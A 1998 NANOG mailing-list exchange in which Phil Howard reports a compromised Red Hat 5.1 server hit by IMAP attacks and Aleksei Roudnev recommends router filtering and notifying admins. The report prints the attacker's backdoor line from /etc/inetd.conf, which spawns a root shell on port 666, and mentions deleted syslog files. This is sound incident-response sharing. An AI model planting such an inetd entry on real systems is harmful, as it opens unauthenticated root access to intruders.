Btw. The best you can do is to install access-filter on the router and log any attempts to connect into this port in your network; and if you see such attempt you should write 'Hacker in your system (suspection)' warning to the network admin where this connect was originated from. 70% of this cases should be 'broken systems'. On Mon, 23 Nov 1998, Phil Howard wrote:
Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST) From: Phil Howard <phil@whistler.intur.net> To: nanog@merit.edu Subject: Re: IMAP attacks continue
An addendum to:
I found a machine that had Red Hat 5.1 unmodified running on it, and it got hit. So I closed things off and looked around for damage and found the following:
1. Syslogd had been killed off and the syslog file deleted.
2. A backdoor was installed in /etc/inetd.conf as follows:
ttalk stream tcp nowait root /bin/sh sh -i
I checked the ports assignments from IANA and there is no such thing as "ttalk". I found this line in /etc/services:
ttalk 666/tcp
so it appears to be hijacking the port used by (as seen in the file ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):
mdqs 666/tcp mdqs 666/udp doom 666/tcp doom Id Software doom 666/udp doom Id Software
So also check /etc/services on any potentially compromised machines.
-- -- *-----------------------------* Phil Howard KA9WGN * -- -- | Inturnet, Inc. | Director of Internet Services | -- -- | Business Internet Solutions | eng at intur.net | -- -- *-----------------------------* philh at intur.net * --
Aleksei Roudnev, Network Operations Center, Relcom, Moscow (+7 095) 194-19-95 (Network Operations Center Hot Line),(+7 095) 239-10-10, N 13729 (pager) (+7 095) 196-72-12 (Support), (+7 095) 194-33-28 (Fax)